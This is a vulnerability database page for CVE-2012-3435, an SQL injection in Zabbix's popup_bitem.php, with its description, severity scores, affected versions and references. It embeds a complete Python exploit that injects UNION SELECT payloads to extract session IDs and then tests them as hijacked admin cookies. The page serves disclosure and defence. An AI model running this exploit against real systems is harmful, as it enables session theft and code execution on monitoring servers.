CVE-2012-3435 : Detail

CVE-2012-3435

SQL Injection
A03-Injection
0.33%V3
Network
2012-08-15
18h00 +00:00
2017-08-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in frontends/php/popup_bitem.php in Zabbix 1.8.15rc1 and earlier, and 2.x before 2.0.2rc1, allows remote attackers to execute arbitrary SQL commands via the itemid parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20087

Publication date : 2012-07-23 22h00 +00:00
Author : muts
EDB Verified : Yes

#!/usr/bin/python import re import sys,urllib2,urllib print "\n[*] Zabbix 2.0.1 Session Extractor 0day" print "[*] http://www.offensive-security.com" print "##################################\n" ''' The sessions found by this tool may allow you to access the scripts.php file. Through this web interface, an administrator can define new malicious scripts. These scripts can then be called from the maps area, and executed with "zabbix" permissions. Timeline: 17 Jul 2012: Vulnerabilty reported 17 Jul 2012: Reply received 18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348 19 Jul 2012: Fixed for inclusion in version 2.0.2 ''' ip="172.16.164.150" target = 'http://%s/zabbix/popup_bitem.php' % ip url = 'http://%s/zabbix/scripts.php' % ip def sendSql(num): global target payload="1)) union select 1,group_concat(sessionid) from sessions where userid='%s'#" % num payload="1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid='%s'#" % num values = {'dstfrm':'1','itemid':payload } url = "%s?%s" % (target, urllib.urlencode(values)) req = urllib2.Request(url) response = urllib2.urlopen(req) data = response.read() return data def normal(cookie): global url req = urllib2.Request(url) cook = "zbx_sessionid=%s" %cookie req.add_header('Cookie', cook) response = urllib2.urlopen(req) data = response.read() if re.search('ERROR: Session terminated, re-login, please',data) or re.search('You are not logged in',data) or re.search('ERROR: No Permissions',data): return "FAIL" else: return "SUCCESS" sessions=[] for m in range(1,2): print "[*] Searching sessions belonging to id %s" % m hola=sendSql(m) for l in re.findall(r"([a-fA-F\d]{32})", hola): if l not in sessions: sessions.append(l) print "[*] Found sessionid %s - %s" % (l,normal(l))

Products Mentioned

Configuraton 0

Zabbix>>Zabbix >> Version To (including) 1.8.15

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1

Zabbix>>Zabbix >> Version 1.1.1

Zabbix>>Zabbix >> Version 1.1.2

Zabbix>>Zabbix >> Version 1.1.3

Zabbix>>Zabbix >> Version 1.1.4

Zabbix>>Zabbix >> Version 1.1.5

Zabbix>>Zabbix >> Version 1.1.6

Zabbix>>Zabbix >> Version 1.1.7

Zabbix>>Zabbix >> Version 1.3

Zabbix>>Zabbix >> Version 1.3.1

Zabbix>>Zabbix >> Version 1.3.2

Zabbix>>Zabbix >> Version 1.3.3

Zabbix>>Zabbix >> Version 1.3.4

Zabbix>>Zabbix >> Version 1.3.5

Zabbix>>Zabbix >> Version 1.3.6

Zabbix>>Zabbix >> Version 1.3.7

Zabbix>>Zabbix >> Version 1.3.8

Zabbix>>Zabbix >> Version 1.4.2

Zabbix>>Zabbix >> Version 1.4.3

Zabbix>>Zabbix >> Version 1.4.4

Zabbix>>Zabbix >> Version 1.4.5

Zabbix>>Zabbix >> Version 1.4.6

Zabbix>>Zabbix >> Version 1.5

Zabbix>>Zabbix >> Version 1.5.1

Zabbix>>Zabbix >> Version 1.5.2

Zabbix>>Zabbix >> Version 1.5.3

Zabbix>>Zabbix >> Version 1.5.4

Zabbix>>Zabbix >> Version 1.6

Zabbix>>Zabbix >> Version 1.6.1

Zabbix>>Zabbix >> Version 1.6.2

Zabbix>>Zabbix >> Version 1.6.3

Zabbix>>Zabbix >> Version 1.6.4

Zabbix>>Zabbix >> Version 1.6.5

Zabbix>>Zabbix >> Version 1.6.6

Zabbix>>Zabbix >> Version 1.6.7

Zabbix>>Zabbix >> Version 1.6.8

Zabbix>>Zabbix >> Version 1.6.9

Zabbix>>Zabbix >> Version 1.7

Zabbix>>Zabbix >> Version 1.7.1

Zabbix>>Zabbix >> Version 1.7.2

Zabbix>>Zabbix >> Version 1.7.3

Zabbix>>Zabbix >> Version 1.7.4

Zabbix>>Zabbix >> Version 1.8

Zabbix>>Zabbix >> Version 1.8.1

Zabbix>>Zabbix >> Version 1.8.2

Zabbix>>Zabbix >> Version 1.8.3

Zabbix>>Zabbix >> Version 1.8.3

Zabbix>>Zabbix >> Version 1.8.3

Zabbix>>Zabbix >> Version 2.0.0

Zabbix>>Zabbix >> Version 2.0.0

Zabbix>>Zabbix >> Version 2.0.0

Zabbix>>Zabbix >> Version 2.0.0

Zabbix>>Zabbix >> Version 2.0.0

Zabbix>>Zabbix >> Version 2.0.0

Zabbix>>Zabbix >> Version 2.0.0

Zabbix>>Zabbix >> Version 2.0.1

Zabbix>>Zabbix >> Version 2.0.1

Zabbix>>Zabbix >> Version 2.0.1

References

http://www.exploit-db.com/exploits/20087
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/50475
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2012/dsa-2539
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/49809
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.openwall.com/lists/oss-security/2012/07/27/6
Tags : mailing-list, x_refsource_MLIST
http://www.securityfocus.com/bid/54661
Tags : vdb-entry, x_refsource_BID
http://osvdb.org/84127
Tags : vdb-entry, x_refsource_OSVDB
http://www.openwall.com/lists/oss-security/2012/07/28/3
Tags : mailing-list, x_refsource_MLIST